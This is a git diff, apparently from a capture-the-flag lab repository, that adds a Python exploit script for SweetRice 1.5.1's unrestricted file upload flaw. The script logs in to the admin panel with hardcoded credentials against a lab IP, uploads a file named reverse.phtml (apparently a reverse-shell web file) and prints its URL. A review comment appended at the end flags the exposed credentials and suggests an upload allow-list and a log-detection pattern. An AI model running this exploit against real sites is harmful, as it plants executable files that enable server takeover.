Diffstat (limited to 'lazyadmin/40716.py')
-rwxr-xr-xlazyadmin/40716.py45
1 files changed, 45 insertions, 0 deletions
diff --git a/lazyadmin/40716.py b/lazyadmin/40716.py
new file mode 100755
index 0000000..63c6f16
--- /dev/null
+++ b/lazyadmin/40716.py
@@ -0,0 +1,45 @@
+#/usr/bin/python
+#-*- Coding: utf-8 -*-
+# Exploit Title: SweetRice 1.5.1 - Unrestricted File Upload
+# Exploit Author: Ashiyane Digital Security Team
+# Date: 03-11-2016
+# Vendor: http://www.basic-cms.org/
+# Software Link: http://www.basic-cms.org/attachment/sweetrice-1.5.1.zip
+# Version: 1.5.1
+# Platform: WebApp - PHP - Mysql
+
+from requests import session
+
+# Get Host & User & Pass & filename
+host = '10.10.101.44/content'
+username = 'manager'
+password = 'Password123'
+filename = 'reverse.phtml'
+file = {'upload[]': open(filename, 'rb')}
+
+payload = {
+ 'user':username,
+ 'passwd':password,
+ 'rememberMe':''
+}
+
+
+
+with session() as r:
+ login = r.post('http://' + host + '/as/?type=signin', data=payload)
+ success = 'Login success'
+ if login.status_code == 200:
+ print("[+] Sending User&Pass...")
+ if login.text.find(success) > 1:
+ print("[+] Login Succssfully...")
+ else:
+ print("[-] User or Pass is incorrent...")
+ print("Good Bye...")
+ exit()
+ pass
+ pass
+ uploadfile = r.post('http://' + host + '/as/?type=media_center&mode=upload', files=file)
+ if uploadfile.status_code == 200:
+ print("[+] File Uploaded...")
+ print("[+] URL : http://" + host + "/attachment/" + filename)
+ pass
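Review bot: The assignments near the top of the new file (`host = '10.10.101.44/content'`, `username = 'manager'`, `password = 'Password123'`) commit a target address and a credential pair in plain text. If they belong to a real engagement or a shared lab account, treat them as exposed to everyone with read access to the repository, rotate them, and keep them out of version control. The header names the issue but not the fix, so I would add a comment such as `# Mitigation: allow-list upload extensions server-side and disable script execution under /attachment/`. This assumes, as the printed URL suggests, that uploaded files are served from that directory. For detection, the two requests visible here are the pattern to alert on in web logs: a POST to `/as/?type=media_center&mode=upload`, followed by a request for a `.phtml` file under `/attachment/`.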